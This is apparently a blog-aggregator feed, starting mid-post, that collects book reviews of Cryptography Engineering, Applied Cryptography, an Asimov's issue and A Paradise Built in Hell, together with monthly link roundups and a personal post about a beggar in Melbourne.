failure modes, a theme they continue throughout the book. From there, the book moves into a general discussion of major cryptographic areas: encryption, authentication, public-key cryptography, digital signatures, PKI, and issues of performance and complexity. The in-depth discussion starts with chapters on block ciphers, block cipher modes, hash functions, and MACs, which together form part two (message security). The block cipher mode discussion is particularly good and includes algorithms newer than those in Applied Cryptography. This part closes with a walkthrough of constructing a secure channel, in pseudocode, and a chapter on implementation issues. The implementation chapters throughout the book are necessarily more general, but for me they were one of the most useful parts of the book, since they take a step back from the algorithms and look at the perils and pitfalls of using them to do real work. The third part of the book is on key negotiation and encompasses random numbers, prime numbers, Diffie-Hellman, RSA, a high-level look at cryptographic protocols, and a detailed look at key negotiation. 
This will probably be the hardest part of the book for a lot of readers, since the introduction to public-key is very heavy on math. The authors feel that's unavoidable to gain any understanding of the security risks and attack methods against public-key. I'm not quite convinced. But it's useful information, if heavy going that requires some devoted attention. I want to particularly call out the chapter on random numbers, though. This is an often-overlooked area in cryptography, particularly in introductions for the non-expert, and this is the best discussion of pseudo-random number generators I've ever seen. The authors walk through the design of Fortuna as an illustration of the issues and how they can be avoided. I came away with a far better understanding of practical PRNG design than I've ever had (and more sympathy for the annoying OpenSSL ~/.rnd file). The last substantial part of the book is on key management, starting with a discussion of time and its importance in cryptographic protocols. From there, there's a discussion of central trusted key servers and then a much more comprehensive discussion of PKI, including the problems with revocation, key lifetime, key formats, and keeping keys secure. The concluding chapter of this part is a very useful discussion of key storage, which is broad enough to encompass passwords, biometrics, and secure tokens. This is followed by a short part discussing standards, patents, and experts. A comparison between this book and Applied Cryptography reveals less attention to the details of cryptographic algorithms (apart from random number generators, where Cryptography Engineering provides considerably more useful information), wide-ranging surveys of algorithms, and underlying mathematics. Cryptography Engineering also makes several interesting narrowing choices, such as skipping stream ciphers almost entirely. Less surprisingly, this book covers only a tiny handful of cryptographic protocols; there's nothing here about zero-knowledge proofs, blind signatures, bit commitment, or even secret sharing, except a few passing mentions. That's realistic: those protocols are often extremely difficult to understand, and the typical security system doesn't use them. Replacing those topics is considerably more discussion of implementation techniques and pitfalls, including more assistance from the authors on how to choose good cryptographic building blocks and how to combine them into useful systems. This is a difficult topic, as they frequently acknowledge, and a lot of the advice is necessarily fuzzy, but they at least provide an orientation. To get much out of Applied Cryptography, you needed a basic understanding of what cryptography can do and how you want to use it. Cryptography Engineering tries to fill in that gap to the point where any experienced programmer should be able to see what problems cryptography can solve (and which it can't). That brings me back to the question of which book you should read, and a clear answer: start here, with Cryptography Engineering. It's more recent, which means that the algorithms it discusses are more directly applicable to day-to-day work. The block cipher mode and random number generator chapters are particularly useful, even if, for the latter, one will probably use a standard library. And it takes more firm stands, rather than just surveying. This comes with the risk of general principles that aren't correct in specific situations, but I think for most readers the additional guidance is vital. 
That said, I'm still glad I read Applied Cryptography, and I think I would still recommend reading it after this book. The detailed analysis of DES in Applied Cryptography is worth the book by itself, and more generally the survey of algorithms is useful in showing the range of approaches that can be used. And the survey of cryptographic protocols, if very difficult reading, provides tools for implementing (or at least understanding) some of the fancier and more cutting-edge things that one can do with cryptography. But this is the place to start, and I wholeheartedly recommend Cryptography Engineering to anyone working in computer security. Whether you're writing code, designing systems, or even evaluating products, this is a very useful book to read. It's a comprehensive introduction if you don't know anything about the field, but deep enough that I still got quite a bit of new information from it despite having written security software for years and having already read Applied Cryptography. Highly recommended. I will probably read it from cover to cover a second time when I have some free moments. Rating: 9 out of 10
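As a back-of-envelope illustration of the 128-bit security level discussed above (my own arithmetic, not a calculation from the book), assume a hypothetical attacker who can test 10^18 keys per second:
\[
2^{128} \approx 3.4 \times 10^{38}, \qquad
\frac{3.4 \times 10^{38}}{10^{18}\ \text{ops/s}} \approx 3.4 \times 10^{20}\ \text{s} \approx 1.1 \times 10^{13}\ \text{years},
\]
which is roughly 800 times the current age of the universe.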

30 November 2013

Russell Coker: Links November 2013

Shanley wrote an insightful article about microaggressions and management [1]. It's interesting to read that and think of past work experiences; even the best managers do it. Bill Stone gave an inspiring TED talk about exploring huge caves, autonomous probes to explore underground lakes (which can be used on Europa), and building a refuelling station on the Moon [2]. Simon Lewis gave an interesting TED talk about consciousness and the technology needed to help him recover from injuries sustained in a serious car crash [3]. Paul Wayper wrote an interesting article about reforming the patent system [4]. He also notes that the patent system is claimed to be protecting the mythical home inventor when it's really about patent trolls (and ex-inventors who work for them). This is similar to the way that ex-musicians work for organisations that promote extreme copyright legislation. Amanda Palmer gave an interesting TED talk about asking for donations/assistance, and the interactions between musicians and the audience [5]. Some parts of this are NSFW. Hans Rakers wrote a useful post about how to solve a Dovecot problem with too many files open [6]. His solution was for a Red Hat based system; for Debian you can do the same by editing /etc/init.d/dovecot (a minimal sketch appears at the end of this post). The use of the /proc/N/limits file was interesting; I've never had a cause to deliberately use that file before. Krebs on Security has an interesting article about Android malware being used to defeat SMS systems to prevent bank fraud [7]. Apparently an infected PC will instruct the user to install an Android app to complete the process. Rick Falkvinge wrote an interesting article about how to apply basic economics terminology to so-called Intellectual Property [8]. Matthew Garrett wrote an interesting post about the way that Ubuntu gets a better result than Debian and Fedora because it has clear fixed goals [9]. He states that many people regard Fedora as "a playground to produce a range of niche derivatives"; probably a large portion of the Fedora and Debian developers consider this a feature, not a bug. Ming Thein wrote an interesting article about the demise of the DSLR [10]. Bruce Schneier wrote an interesting post on the detention of David Miranda by the British authorities [11]. It's mostly speculation as to why they would do such a thing (which seems to go against their own best interests) and whether the NSA even knows which documents Edward Snowden copied. Jaclyn Friedman wrote an interesting article on Men's Rights Movements (MRAs) and how they are bad for MEN as well as for women [12]. Rodney S. Tucker wrote an insightful article for the IEEE about the NBN [13]. Basically the Liberal party are going to spend most of the tax money needed for a full NBN but get significantly less than the full benefit. Lauren Drell wrote an interesting article for Mashable about TellSpec, a portable spectrometer that communicates with an Android phone to analyse food for allergens [14]. I guess this will stop schools from banning phones. Katie McDonough wrote an interesting article for Salon about the Pope's statements about the problems with unchecked capitalism [15]. His ideas are really nothing new to anyone who has read the Bible and read the news. It seems to me that the most newsworthy part of this is that most Christian leaders don't make similar statements. Daniel Leidert wrote an interesting post about power saving when running Debian on an HP Microserver [16]. 
Most of it is relevant to other AMD64 hardware too; I'll have to investigate the PCIe ASPM and spin-down options on some of my systems that are mostly idle.
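A minimal sketch of the Debian-side tweak mentioned in the Dovecot item above; the limit value is illustrative and the snippet assumes the classic sysvinit script is still in use:
# In /etc/init.d/dovecot, before the daemon is started, raise the
# per-process open-file limit so IMAP processes stop hitting EMFILE:
ulimit -n 65536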

24 October 2013

Russ Allbery: Review: Applied Cryptography

Review: Applied Cryptography, by Bruce Schneier
Publisher: John Wiley & Sons
Copyright: 1996
ISBN: 0-471-11709-9
Format: Trade paperback
Pages: 621
This is the next entry in the series of Russ reading books that he bought years ago and never got around to reading. Thankfully, this time, the book has aged somewhat better. This review is for the second edition of Applied Cryptography, published in 1996. Given how important computer security has become, and how central cryptography is to computer security, one might think that the passage of 17 years would make a book effectively obsolete. This turns out not to be the case. Yes, Rijndael (the current AES standard and the most widely-used block cipher), Camellia (the up-and-comer in the block cipher world), and the SHA-2 hash postdate this book and aren't discussed. Yes, there have been some further developments in elliptic-curve public-key cryptography. And yes, much of the political information in this book, as well as the patent situation for public-key cryptosystems, is now mostly of historical interest. But a surprising amount of this book still applies directly. Partly that's because much of Applied Cryptography is focused on general principles, classes of algorithms, and cryptographic protocols, and those do not change quickly. A rather amazing number of techniques and protocols still in widespread use today originated in the 1970s. Block ciphers, stream ciphers, cipher modes, public-key systems, signature systems, hash functions, key exchange, secret splitting, key management, and other, similar topics have not changed substantially. And even in the area of specific algorithms, DES is still in use (unfortunately) and its analysis is valuable for understanding any block cipher. RC4, Triple DES, CAST, RSA, MD4, MD5, and SHA-1 are still part of the cryptography landscape, and Schneier was already warning against using MD5 in 1996. The source code included in this book has, thankfully, been made obsolete by widely-available, high-quality free implementations of all common ciphers, available for any modern operating system. But the math, the explanations, and much of the cryptanalysis is still quite relevant. While it contains a comprehensive introduction to cryptographic concepts, Applied Cryptography is structured more like a reference manual than a tutorial. The first two chapters provide some foundations. Then, a wide variety of protocols, from the common to the completely esoteric, are discussed across the subsequent four chapters. There are four chapters on the basics of ciphers, another chapter on the mathematics, and then the longest part of the book: twelve chapters that provide a tour of all major and several interesting minor protocols that existed in 1996. These are organized into block ciphers, stream ciphers (and pseudo-random number generators), hash functions, and public-key systems. An entire chapter is devoted to the history and analysis of DES, and I think that was my favorite chapter of the book. Not only is it worth understanding how DES works, but it also provides a comprehensive introduction to the complexities of block cipher design, the politics of interactions with the NSA, and a fascinating history of early computer cryptosystems. Finally, Applied Cryptography closes with chapters on real-world systems and on politics. The politics section is mostly a historical curiosity, as is much of the chapter on real-world systems. Schneier discusses some of the PKCS and X.509 protocols here but doesn't use SSL as one of his examples despite its specification predating this book (perhaps the most glaring omission of the book). 
But he does discuss Kerberos (which is of personal interest to me), and it was useful to see it analyzed in the broader context of this sort of book. Those who read Schneier's blog regularly, or who have read any of his other books, will know that he's concise, incisive, and very readable, even with difficult material. I think he does err on the side of compactness this is not a book that handholds the reader or explains something more than once but there's a lot of ground to cover, so I can't really blame him. Expect to have to read the more difficult parts several times, and (at least on a first read) expect to just skip past some of the most complex sections as probably not worth the effort. But I think Schneier does a great job structuring the book so that one comes away with a high-level impression and overview sufficient to make informed guesses about capabilities and relative difficulty even if one doesn't have the patience to work through the details. I suspect most readers will want to skim at least part of this book. Unless you're willing to do a lot of background reading to understand the math, or a lot of careful study to follow the detailed descriptions and flaws in often-obscure algorithms, the algorithm discussions start to blend together. I found myself skipping a lot of the math and focusing on the basic descriptions and the cryptanalysis, particularly for the obscure ciphers. Many of the algorithms are also highly opaque and of obscure benefit; I doubt I will ever care about blind signatures or oblivious transfer, and I struggled to wrap my mind around the details of bit commitment (although it's apparently important in zero knowledge proofs, which in turn are relevant to authentication). But this is not the sort of book where you have to read every word. It's very well-structured, provides clear resynchronization points for readers who have had enough of a particular topic, and marks the topics that are more obscure or of dubious general usefulness. The most useful parts of this book, in my opinion, are the basic conceptual introductions to each class of cryptographic algorithm or protocol, and those chapters are excellent. I've been working in applied computer security, at the application and deployment level, for years, and this is the first time that I've felt like I really understood the difference between a block cipher and a stream cipher, or the implications of block cipher mode selection. Applied Cryptography is also a fascinating exercise in adjusting one's intuition for where the complexity lies. It's a memorable experience to move from the chapters on block ciphers, full of S-boxes and complex mixing and magic numbers, into the far more straightforward mathematical analysis of stream ciphers. Or the mathematical simplicity of RSA (although quite a bit of complexity is lurking on the cryptanalysis side, much of which is only touched on here). Of more historical interest, but still quite impressive, is that Applied Cryptography doubles as a comprehensive literature review. Not only does it cover nearly every algorithm in use at the time, it discusses the cryptography literature on nearly every topic with brief summaries of results and lines of investigation. The references section is a stunning 66 pages of small print featuring 1,653 references, and those are mentioned and put in context throughout the book. 
I'm not personally interested in chasing those lines of research further, and of course 17 years means there are many new papers that are as important to read today, but it's obvious that this book would have been an amazing and invaluable map to the research territory when it was first published. There are now newer books on this topic that you should consider if you're purchasing a book today. Cryptography Engineering in particular is in my to-read pile, and I'm interested to see how much of this book it could replace, although I believe it's lighter on the mathematical analysis and details. But I think Applied Cryptography still has a place on the bookshelf of any computer security professional. Schneier is succinct, detailed, straightforward, and comprehensive, at least for 1996, and I know I'll be reaching for this book the next time I forget the details of CFB mode and then get hopelessly confused by the Wikipedia article on the topic. Rating: 8 out of 10

28 May 2013

Russell Coker: Links May 2013

Cameron Russell (who works as an underwear model) gave an interesting TED talk about beauty [1]. Ben Goldacre gave an interesting and energetic TED talk about bad science in medicine [2]. A lot of the material is aimed at non-experts, so this is a good talk to forward to your less scientific friends. Lev wrote a useful description of how to disable JavaScript from one site without disabling it from all sites, which was inspired by Snopes [3]. This may be useful some time. Russ Allbery wrote an interesting post about work and success titled "The Why? of Work" [4]. Russ makes lots of good points and I'm not going to summarise them (read the article, it's worth it). There is one point I disagree with: he says "You are probably not going to change the world". The fact is that I've observed Russ changing the world; he doesn't appear to have done anything that will get him an entry in a history book, but he's done a lot of good work in Debian (a project that IS changing the world), and his insightful blog posts and comments on mailing lists influence many people. I believe that most people should think of changing the world as a group project where they are likely to be one of thousands or millions who are involved; then you can be part of changing the world every day. James Morrison wrote an insightful blog post about what he calls "Penance driven development" [5]. The basic concept of doing something good to make up for something you did which has a bad result (even if the bad result was inadvertent) is probably something that most people do to some extent, but formalising it in the context of software development work is a concept I haven't seen described before. A 9yo boy named Caine created his own games arcade out of cardboard; when the filmmaker Nirvan Mullick saw it, he created a short movie about it and promoted a flash mob event to play games at the arcade [6]. They also created the Imagination Foundation to encourage kids to create things from cardboard [7]. Tanguy Ortolo describes how to use the UDF filesystem instead of FAT for USB devices [8]. This allows you to create files larger than 2G while still allowing the device to be used on Windows systems. I'll keep using BTRFS for most of my USB sticks though. Bruce Schneier gave an informative TED talk about security models [9]. Probably most people who read my blog already have a good knowledge of most of the topics he covers. I think that the best use of this video is to educate less technical people you know. Blaine Harden gave an informative and disturbing TED talk about the concentration camps in North Korea [10]. At the end he points out the difficult task, which will follow the fall of North Korea, of helping people recover from their totalitarian government. Bruce Schneier has an interesting blog post about the use of a motherboard BMC controller (IPMI and similar) to compromise a server [11]. Also some business class desktop systems and laptops have similar functionality. Russ Allbery wrote an insightful article about the failures of consensus decision-making [12]. He compares the Wikipedia and Debian methods, so his article is also informative for people who are interested in learning about those projects. The TED blog has a useful reference article with 10 places anyone can learn to code [13]. Racialicious has an interesting article about the people who take offense when it's pointed out that they have offended someone else [14]. 
Nick Selby wrote an interesting article criticising the Symantec response to the NYT getting hacked, and also criticising anti-virus software in general [15]. He raises a point that most of us already know: anti-virus software doesn't do much good. Securing Windows networks is a losing game. Joshua Brindle wrote an interesting blog post about security on mobile phones and the attempts to use hypervisors for separating data of different levels [16]. He gives lots of useful background information about how to design and implement phone-based systems.

16 May 2013

Russ Allbery: Review: Asimov's, July 2011

Review: Asimov's Science Fiction, July 2011
Editor: Sheila Williams
Issue: Volume 35, No. 7
ISSN: 1065-2698
Pages: 112
Williams's editorial is a mildly interesting piece about story titles. Silverberg's column is a more interesting (and rather convincing) rebuttal of the joke that fiction authors are "professional liars," combined with an examination of a fake and fantastic 14th travelogue that (at least in Silverberg's telling) was widely believed at the time. The precis of Silverberg's argument is that lying requires an intent to deceive, which is a property of deceptive memoir writers but not of fiction authors. Di Filippo's review column, as usual, is devoted almost entirely to esoterica, although I was moderately interested to hear of Stableford's continued work on translating early French SF. None of it seems compelling enough to go buy, but good translations of early works seem like a good thing to have in the world. "Day 29" by Chris Beckett: The conceit of this novelette is an interstellar travel system akin to a transporter that allows near-instantaneous travel between worlds. The drawback is that all memories from somewhere between 40 and 29 days before transit up until transit are wiped. The progatonist is a data analyst who is about to travel, and therefore by agency rule is required to stop doing work on day 40 before transmission since he can't be held legally liable for anything he has no recollection of doing. (I would like to say that I find this implausible, since one could always keep records, but it's exactly the sort of ass-covering regulation that a human resources department would come up with.) The premise is quite interesting: what do you do during that period that you're going to forget? Beckett wisely mixes Stephen's current waiting period on the colony world with his diary of his original waiting period on Earth the first time he went through the transmission process, and the latter adds greatly to the reader's appreciation of the weirdness of the forgotten interval. Unfortunately, this is a story more about psychological exploration than about plot, and Stephen just isn't very interesting. The telepathic but possibly nonsentient aliens add weirdness but not much else, and the ending of the story provided little sense of closure or conclusion for me. A good idea, but not the execution I wanted. (5) "Pug" by Theodora Goss: Since I grew up with a pug, I have a soft spot for a story featuring one; sadly, though, this story has insufficient pug in it. This is a quiet fantasy (Asimov's calls it SF, presumably on the basis of parallel worlds and a hypothesized scientific explanation, but it reads like fantasy to me) featuring Victorian girls, including one with a bad heart. They discover a hidden door to other versions of their world and do some minor exploration. There's little or nothing in the way of plot; the story is more of an attempt to capture a mood. It's mildly diverting, but I wish it had gone somewhere more substantial. (5) "Dunyon" by Kristine Kathryn Rusch: A Rusch story is often the highlight of an issue, and this is no exception. The protagonist is the owner of a bar in a space station that's become a combination of a refugee camp and a slum. War and chaos have created desperate people, most of whom are attempting to find some way to resources and get out of the bottom of society. The story is about a rumor: a mythical system named Dunyon that's safe and far away. And it's about how people react to that rumor. There's nothing particularly surprising about the direction the story goes (it's fairly short), but Rusch is always a good storyteller. 
(7) "The Music of the Sphere" by Norman Spinrad: I've had mixed feelings about Spinrad's fiction (and some of his essays), but I liked this story, despite its implausibility. It's set in the near future, featuring an expert in cetaceans and dolphin perception and a composer obsessed with both loud music and classical musical style. Just from that description, you can probably predict much of the story, but I thought it had some neat ideas about dolphins, whales, and alternate perception and aesthetics. (Note: neat, not necessarily biologically plausible.) Enjoyable. (6) "Bring on the Rain" by Josh Roseman: In a change of pace from the rest of the issue, this is a post-apocalyptic story of caravans of wheeled ships traversing a scorched and ruined landscape in search of weather systems and rain. The feel is of an inverted Waterworld, but with more emphasis on military tactics and cooperating fleets. The transposition of fleet maneuvers to huge ground vehicles adds some extra fun. The plot has little to do with the background and is a fairly stock military adventure scenario, but it's reasonably well-told. The story feels like an excerpt from a larger military-SF-inspired adventure, but the length keeps the quantity of tactics and maneuvering below the threshold where I would get bored. (6) "Twelvers" by Leah Cypess: This is a sharp and occasionally mean story of adolescent cruelty and alienation. Darla is a "twelver," a child who was carried an extra three months in the womb using newly-invented medical technology because of a belief in the advantages this would bring in later life. Unfortunately for all those who used this technique, what it also brought was a preternatural calm and an unusual reaction to emotions. Darla finds it almost impossible to get upset at anything, and that, of course, prompts the cruelty and abuse of other children. Most of the story is a description of that abuse, leading up to Darla stumbling into a nasty solution to her immediate problem. It's all very believable (well, apart from the motivating biology), but I didn't enjoy reading about it, and I'm certainly not convinced that the ending will lead to anything good. (5) "The Messenger" by Bruce McAllister: This is a very short time travel story, where time travel is used to try to unwind old family pain. This world follows the unalterable history model: no changes to the past are possible, and anything you do in the past has already happened. The mechanics are mostly avoided. Instead, McAllister concentrates on his mother, his father, and their complex relationship. I would have needed a bit more background on the characters to care enough about them for the story to be fully effective, but while the heartstring-pulling is kind of obvious, it's still a solid story. (6) "The Copenhagen Interpretation" by Paul Cornell: This is the most ingenious of the stories in this issue. It's set in a future world that extends what seemed to me to be pre-World-War-I great power politics, although there may be a hint of the Cold War. Great nations have reached a careful balance of power, and spies and secret services work to sustain that balance. The progatonist is one of those agents, making use of advanced technology like space folds in the service of a cause that he doesn't entirely believe in. Cornell mixes in mental conditioning, artificial people, space travel, and even aliens (maybe) in a taut thriller plot that, for me, gained a great deal from the unexplained strangeness of its background. 
If you like diving into the deep end and following a fast-moving plot against a background of strangeness, this is the sort of SF you'll enjoy. (7) Rating: 6 out of 10

23 February 2013

Russell Coker: Serious Begging

This evening I was driving through one of the inner suburbs of Melbourne when a man flagged me down. He said that his mother was dying and he needed a taxi ride to some hospital far away and needed to borrow $200. He was saying something about his phone; I wasn't sure if he was planning to give me his phone number so I could call him to ask for repayment, or offering his phone as collateral on the loan (incidentally, a well-known scam is to offer a stolen phone as collateral for a loan; it's a way of selling a locked phone that doesn't have cables). I've encountered many beggars over the years, but he was by far the most serious about it: he demonstrated the level of desperation that I've only previously seen documented in history books and reports from travelers who visited developing countries. I will never know if his mother was dying; there are lots of other reasons why someone might urgently need cash (most of which won't get much sympathy). I gave him $20 as a gift. If his story was legitimate then I gave him 10% of what he needed, so he only had to find another 9 people willing to do the same. If he was lying then I can afford to lose $20. In any case I definitely wasn't going to do what he asked and withdraw hundreds of dollars from an ATM for him. Also, regardless of whether he was telling the truth, I didn't want to have him repay me; if he's telling the truth then I'm happy to give money to him, and if he's not then I'm better off avoiding him in future. If I had $50 I would probably have given it to him, but $200 is too much. As I drove off I looked in my rear-vision mirror and saw him running between cars on the road trying to flag someone else down. Running through moving traffic on a Saturday night is another indication of how serious he was; generally someone who's in a good state of mind and wants a long and healthy life won't do that.

25 December 2012

Russ Allbery: Review: A Paradise Built in Hell

Review: A Paradise Built in Hell, by Rebecca Solnit
Publisher: Penguin
Copyright: 2009
Printing: 2010
ISBN: 0-14-311807-2
Format: Trade paperback
Pages: 319
A Paradise Built in Hell is a book with an agenda. Solnit's goal is to convince the reader that nearly everything we're shown in movies and popular culture about human behavior during disasters is wrong. Not only is destructive mass panic unusual verging on nonexistent, spontaneous cooperation and acts of startling courage and resourcefulness are commonplace. The heroes that we hear about afterwards are more the norm than the exception. Disasters are far more likely to bring out the best in people than the worst. They break down barriers and form spontaneous human communities that survivors remember for a lifetime. Rather than natural disasters leading inevitably to an exacerbating human crisis in the absence of strong authority, Solnit argues that they are an amazing human opportunity, and that the most negative and destructive human behavior during crises is not from untrained victims but from the panic of the elites who are supposedly responsible for protecting the public. I think her analysis and presentation is both deeply appealing and deeply flawed. The flaws involve extrapolation and generalization beyond the applicability of her research, and I'll say more about that in a moment. But the appeal is still surprising and satisfying, and I think there's a lot of truth in this book despite its one-sided presentation. I like to tell people, half-jokingly, that I'm an anarchosyndicalist. It's my political alliegance of the heart: the political structure that I know would never work, but that matches the world I want to live in. (I suspect much of the belief in libertarianism is of this form.) Now I have a book to point people at when they ask what the appeal of anarchosyndicalism is. The sense of spontaneous community, of bonding, of reaching out to other people to do something necessary, together, that Solnit describes here in the aftermath of a disaster matches that vision of a world without imposed economic authority, where people spontaneously collaborate to solve problems. A Paradise Built in Hell is structured by disaster, providing a tour of major disasters and their aftermath interspersed with extended musings on what the human reactions mean and how disaster communities functioned. The major disasters discussed are the 1906 San Francisco earthquake, the Halifax explosion, the 1985 Mexico City earthquake, 9/11, and Hurricane Katrina. Solnit moves through them in chronological order, closing the book with Katrina, which had (at least for me) the most infuriating and uplifting mixes of community bonding and elite panic. But both of those factors are present from the beginning in the 1906 earthquake: spontaneous human organization that (from multiple first-hand accounts) transformed people's lives mixed with a military reaction and elite panic that possibly did more damage to the city than the earthquake did. Elite panic is the dark side of Solnit's celebration of human altruism and spontaneous community organization. The primary picture she paints is of ordinary people responding with great courage and creativity and finding, in their reaction, a transformative experience and a sense of purpose that often becomes the most powerful and positive experience of their life. But this is at odds with a deeply-entrenched elite belief in mass panic, in the necessity of keeping information from the public to suppress their reaction, and in the need to re-establish "order." And with that, Solnit is absolutely scathing, and with some justification. 
Along with detailed accounts of these major disasters, Solnit also gives the reader a tour of the research literature on disasters, research that has shown that the panic and chaos at the center of practically every disaster movie ever made is essentially a myth. Mass panic in disasters is not only rare, it's close to non-existent.

As you might expect, the handling of Katrina by both the government and by neighboring white communities is the subject of the harshest attacks. The material on Katrina presented here is enough to make anyone want to throw out the current playbook on how we react to disasters (and lest one think Solnit is unfair, her research matches very closely with other research and journalism on Katrina that I've seen from a wide variety of sources). But Solnit shows that this is a pattern: our media-driven beliefs about how people will react to disasters, combined with the elite need to re-establish control, play out in many major disasters, and almost always negatively. Even in 9/11, the official response in some cases hampered and undermined an already-effective unofficial response.

This is very interesting and has concrete implications for public policy around disasters. But Solnit moves onto thinner anarchosyndicalist ice with the story she tells about disasters as dramatic upheavals of the established social order that could point to a revolution in how we interact with each other. Solnit is deeply inspired by human altruism during disasters, and her enthusiasm is somewhat contagious, but it was useful to read this book shortly after Bruce Schneier's Liars and Outliers. I think Solnit, in her understandable eagerness to find a way to extend disaster behavior to general life, does not understand the relationships between what Schneier terms moral, reputational, and institutional pressures. And that's the core of why we need both to enable spontaneous human response in disasters and to have organized first responders and supporting infrastructure, and why disaster communities will break down when extended beyond the disaster.

When I first mentioned A Paradise Built in Hell to my mother, her first reaction was dubiousness due to her memory of the 1977 New York City blackout. That was a disaster that resulted in widespread looting and destruction, rather than the positive reaction Solnit describes. Solnit does have a cogent argument for why looting is poorly analyzed (we don't, for example, distinguish between breaking into stores to get desperately needed supplies and doing so for personal gain) and why it should not be a priority in a life-threatening disaster. But it's not completely convincing; in some disasters, particularly ones like the 1977 power outage that were not particularly life-threatening, the looting has been the most destructive part of the disaster.

Schneier provides what I think is the missing piece, both to this and to why the wonderful behavior during disasters doesn't last into everyday life. During a life-threatening disaster, moral pressures are massively increased. Nearly all of us have self-images and moral beliefs that provide very strong incentives to help others and collaborate in the face of life-threatening emergencies, incentives that override other motives and lead to the sort of behavior that Solnit celebrates. But moral pressures have inherent limitations. That moral reaction applies most strongly to small groups (such as bands of survivors), and will start to break down as larger society re-establishes itself. And disasters, like a power outage, that are not immediately life-threatening will not provoke the same intensification of moral pressures: we don't have strong moral beliefs and internal stories about staying quietly at home during power outages the way that we do for saving people from burning buildings or pulling them out of rubble. Once larger communities have re-formed and that short-term emergency reaction has dissipated, the need for institutional pressures (police, law, and formal authority structures) will return.

I wish Solnit had been able to read Schneier's book before writing hers. I think his analytical structure provides a healthy dose of realism and perspective to her desire for a self-organizing communal world, and might have blunted her enthusiastic but somewhat unrealistic hopes for finding some key to a revolution in human organization in the heart of disasters.

But if A Paradise Built in Hell is unlikely to lead to a radical change in how we organize societies, it should at least provoke a radical rethinking of some of our unnecessary pessimism about our fellow humans. The evidence is substantial and compelling: crisis brings out the best in people, not the worst, and the ordinary people who happen to be around are capable of becoming some of the most amazing disaster response teams that we can imagine. This has numerous mundane implications for social policy. We should consider simple training for the general public, for example, to strengthen that reaction, should allow for it in legal structures and in the training of first responders (around looting, for instance), and should do everything we can to kill the destructive myth that people cannot be trusted in disasters or that mass panic will be as much of a threat as the disaster itself.

But the best part of this book is that it provides a concrete, well-documented, and well-defended reason to let go of some of our cynicism and to extend a bit of trust to our fellow humans. There sadly aren't earth-shaking implications for everyday society, but there is a wealth of evidence that shows that we're better people in the crunch than we believe we are, or than we expect of others. And the more that we can embrace the dissolution of boundaries and social hierarchies in the middle of disasters, the more we are likely to be surprised by deep human connection and a sense of shared, focused purpose. Solnit is a bit long-winded with her agenda, but that bright hope has stuck with me. Recommended.

Rating: 8 out of 10
